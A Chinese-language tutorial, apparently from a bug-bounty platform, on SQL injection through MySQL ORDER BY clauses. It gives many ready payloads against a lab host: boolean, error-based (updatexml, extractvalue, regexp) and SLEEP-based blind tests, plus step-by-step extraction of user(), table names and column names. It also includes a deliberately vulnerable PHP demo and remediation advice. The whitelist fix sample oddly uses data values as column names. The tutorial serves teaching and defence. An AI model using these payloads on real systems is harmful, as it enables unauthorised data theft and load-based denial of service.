Mysql Order By 註入總結
前言
最近在做一些漏洞盒子後臺項目的總結,在盒子多期眾測項目中,發現註入類的漏洞占比較大。其中Order By註入型的漏洞也占挺大一部分比例,這類漏洞也是白帽子樂意提交的類型(獎金高、被過濾概率小)。今天給大家分享下一些關於Order By的有趣的經驗。
何為order by 註入
本文討論的內容指可控制的位置在order by子句後,如下order參數可控:select * from goods order by $_GET[‘order‘]
註入簡單判斷
在早期註入大量存在的時候,利用order by
子句進行快速猜解表中的列數,再配合union select
語句進行回顯。在測試時,測試者可以通過修改order
在不知道列名的情況下可以通過列的的序號來指代相應的列。但是經過測試這裏無法做運算,如order=3-1
和order=2
是不一樣的。
http://192.168.239.2:81/?order=11 錯誤
http://192.168.239.2:81/?order=1 正常
進一步構造Payload
前面的判斷並不是絕對的,我們需要構造出類似and 1=1
、and 1=2
的Payload以便於註入出數據。
http://192.168.239.2:81/?order=IF(1=1,name,price) 通過name字段排序 http://192.168.239.2:81/?order=IF(1=2,name,price) 通過price字段排序
/?order=(CASE+WHEN+(1=1)+THEN+name+ELSE+price+END) 通過name字段排序
/?order=(CASE+WHEN+(1=2)+THEN+name+ELSE+price+END) 通過price字段排序
http://192.168.239.2:81/?order=IFNULL(NULL,price) 通過price字段排序
http://192.168.239.2:81/?order=IFNULL(NULL,name) 通過name字段排序
另外利用rand
函數也能達到類似的效果,可以觀測到排序的結果不一樣
http://192.168.239.2:81/?order=rand(1=1) http://192.168.239.2:81/?order=rand(1=2)
利用報錯
在有些情況下無法知道列名,而且也不太直觀的去判斷兩次請求的差別,如下用IF語句為例。
返回多條記錄
http://192.168.239.2:81/?order=IF(1=1,1,(select+1+union+select+2)) 正確
http://192.168.239.2:81/?order=IF(1=2,1,(select+1+union+select+2)) 錯誤
/?order=IF(1=1,1,(select+1+from+information_schema.tables)) 正常
/?order=IF(1=2,1,(select+1+from+information_schema.tables)) 錯誤
利用regexp
http://192.168.239.2:81/?order=(select+1+regexp+if(1=1,1,0x00)) 正常
http://192.168.239.2:81/?order=(select+1+regexp+if(1=2,1,0x00)) 錯誤
利用updatexml
http://192.168.239.2:81/?order=updatexml(1,if(1=1,1,user()),1) 正確
http://192.168.239.2:81/?order=updatexml(1,if(1=2,1,user()),1) 錯誤
利用extractvalue
http://192.168.239.2:81/?order=extractvalue(1,if(1=1,1,user())) 正確
http://192.168.239.2:81/?order=extractvalue(1,if(1=2,1,user())) 錯誤
基於時間的盲註
註意如果直接if(1=2,1,SLEEP(2))
,sleep時間將會變成2當前表中記錄的數目,還有比如執行BENCHMARK(1000000,100100)
;等函數,將會對服務器造成一定的拒絕服務攻擊。
/?order=if(1=1,1,(SELECT(1)FROM(SELECT(SLEEP(2)))test)) 正常響應時間
/?order=if(1=2,1,(SELECT(1)FROM(SELECT(SLEEP(2)))test)) sleep 2秒
數據猜解
以猜解user()
即[email protected]
為例子,由於只能一位一位猜解,可以利用SUBSTR
,SUBSTRING
,MID
,以及left
和right
可以精準分割出每一位子串。然後就是比較操作了可以利用=
,like
,regexp
等。這裏要註意like
是不區分大小寫。
通過下可以得知user()
第一位為r
,ascii
碼的16進制為0x72
:
http://192.168.239.2:81/?order=(select+1+regexp+if(substring(user(),1,1)=0x72,1,0x00)) 正確
http://192.168.239.2:81/?order=(select+1+regexp+if(substring(user(),1,1)=0x71,1,0x00)) 錯誤
猜解當前數據庫的表名:
/?order=(select+1+regexp+if(substring((select+concat(table_name)from+information_schema.tables+where+table_schema%3ddatabase()+limit+0,1),1,1)=0x67,1,0x00)) 正確
/?order=(select+1+regexp+if(substring((select+concat(table_name)from+information_schema.tables+where+table_schema%3ddatabase()+limit+0,1),1,1)=0x66,1,0x00)) 錯誤
猜解指定表名中的列名:
/?order=(select+1+regexp+if(substring((select+concat(column_name)from+information_schema.columns+where+table_schema%3ddatabase()+and+table_name%3d0x676f6f6473+limit+0,1),1,1)=0x69,1,0x00)) 正常
/?order=(select+1+regexp+if(substring((select+concat(column_name)from+information_schema.columns+where+table_schema%3ddatabase()+and+table_name%3d0x676f6f6473+limit+0,1),1,1)=0x68,1,0x00)) 錯誤
sqlmap測試
在沒有過濾的情況下是能夠檢測到註入的,如下圖:
附錄服務端代碼
<?php
error_reporting(0);
session_start();
mysql_connect("127.0.0.1", "root", "root") or die("Database connection failed ");
mysql_select_db("sqlidemo") or die("Select database failed");
$order = $_GET[‘order‘] ? $_GET[‘order‘] : ‘name‘;
$sql = "select id,name,price from goods order by $order";
$result = mysql_query($sql);
$reslist = array();
while($row = mysql_fetch_array($result, MYSQL_ASSOC))
{
array_push($reslist, $row);
}
echo json_encode($reslist);
create database sqlidemo;
use sqlidemo;
create table goods (id int(4) not null primary key auto_increment, name char(32) not null, price int(4) not null);
insert into goods (name, price) values("apple", 10);
insert into goods (name, price) values("banana", 15);
insert into goods (name, price) values("peach", 20);
修復建議
這個問題的是由於攻擊者通過測試,了解到應用程序對數據對象進行了直接引用。該類問題可以歸納到OWASP-2013中A4(不安全的對象直接引用)。常見的修復方法如下:
1.通過正則表達式進行字符串過濾。只允許字段中出現字母、數字、下劃線。
2.通過白名單思路,使用間接對象引用。前端傳遞引用數字或者字符串等,用於與後端做數組映射,這樣可以隱藏數據庫數據字典效果,避免直接引用帶來的危害。
<?php
$orderby_whitelist = array(
"apple" => "apple ASC",
"applerev" => "apple DESC",
"daterev" => "banana DESC",
"DEFAULT" => "peach"
);
$order = isset($_GET["order"]) ? $_GET["order"] : "DEFAULT";
$order_expr = array_key_exists($order, $orderby_whitelist) ? $orderby_whitelist[$order] : $orderby_whitelist["DEFAULT"];
mysql_query("SELECT ... FROM ... ORDER BY $order_expr");
參考資料
http://xdxd.love/2016/03/07/order-by%E6%B3%A8%E5%85%A5%E7%82%B9%E5%88%A9%E7%94%A8%E6%96%B9%E5%BC%8F/
https://dev.mysql.com/doc/refman/5.7/en/control-flow-functions.html
https://dev.mysql.com/doc/refman/5.7/en/string-functions.html
Mysql Order By 註入總結